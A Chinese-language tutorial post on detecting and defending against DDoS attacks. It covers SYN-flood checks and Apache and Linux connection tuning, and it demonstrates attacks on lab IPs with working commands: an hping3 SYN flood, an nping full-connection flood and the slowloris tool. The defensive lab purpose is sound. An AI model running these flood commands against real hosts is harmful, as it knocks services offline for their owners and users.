DDoS攻击防御与展示技术

如何判断自己是否遭受 SYN 攻击

bash 复制代码
netstat -na l grep SYN

防御 SYN 洪水攻击----连接数限制

以 Apache web 服务器为例

  • Apache 参数

    文件 apache2.conf

    ListenBackLog

    MaxKeepAliveRequests

  • Linux 系统参数

    文件 sysctl.conf

    net.core.somaxconn

    net.ipv4.tcp_max_syn_backlog

    ulimit -n(打开文件数)

编辑 Centos 7 系统参数文件

bash 复制代码
vi /etc/sysctl.conf

修改或增加下列变量 比如

bash 复制代码
net.core.somaxconn=512 
net.ipv4.tcp_max_syn_backlog=512

生效命令

bash 复制代码
sysctl -p

ListenBackLog 值的位置

kali:/etc/apache2/apache2.conf

centos:/etc/httpd/conf/httpd.conf

hping3 模拟 半连接洪水攻击

bash 复制代码
hping3 192.168.29.170 -p 80 -S --flood -rand-source

192.168.29.170:目标ip

-p:目标端口

-S:TCP SYN 攻击

-i:攻击间隔(--flood:疯狂攻击,全力)

--rand-source:源 ip 随机

nping 模拟 TCP 全连接洪水攻击

bash 复制代码
nping --tcp-connect -rate=100000 -c 10000 192.168.12.117 -p80

-c,-count:运行n次之后停止

--rate:每秒发送包的数量

-q:减少冗余等级

--icmp-type:icmp 类型

-p:指定端口

命令行观测方法

bash 复制代码
watch -n 2 'netstat -n | awk "/^tcp/ {++S[\$NF]} END {for(a in S) print a, S[a]}"'

slowloris 模拟慢速攻击

安装:git clone https://github.com/gkbrk/slowloris

攻击:python3 slowloris.py 192.168.29.10

抓包:tcpdump -vnn host 192.168.29.10 -w 2.pcap

Wireshark 来展示

1)制造大量 http 请求

2)周期性(每~15 秒)发送头,让连接保持

3)永远不关闭连接

PSH 表示有 DATA 数据传输,PSH为1表示是帶有 PUSH 标志的数据,指示接收方应该尽快将这个报文段交给应用层而不用等待缓冲区装满

相关推荐
小快说网安1 天前
跨境业务防护难题:高防 IP 如何解决海外节点 DDoS 攻击延迟问题
网络·tcp/ip·ddos
vortex54 天前
一文厘清DDoS与CC攻击
网络·网络安全·渗透测试·ddos
上海云盾王帅7 天前
如何判断网站被DDoS攻击了?一份从表象到本质的实战诊断手册
ddos
上海云盾-小余8 天前
什么是流量清洗?DDoS 防御的核心原理与实战应用
网络·安全·web安全·ddos
aodunsoft9 天前
安全月报 | 傲盾DDoS攻击防御2026年3月简报
网络·安全·ddos
上海云盾-小余10 天前
CC 攻击与 DDoS 的本质区别:从原理到防御方案全对比
网络·安全·web安全·ddos
同聘云10 天前
阿里云国际站服务器浅谈DDOS攻击与防御
服务器·阿里云·ddos
hanniuniu1314 天前
F5引领DDoS防护新纪元:从被动应对到主动免疫
ddos
桌面运维家14 天前
服务器安全:异常流量监控与DDoS溯源指南
服务器·安全·ddos
上海云盾-小余14 天前
云原生环境下 DDoS 防御升级:弹性清洗与智能调度实战方案
云原生·ddos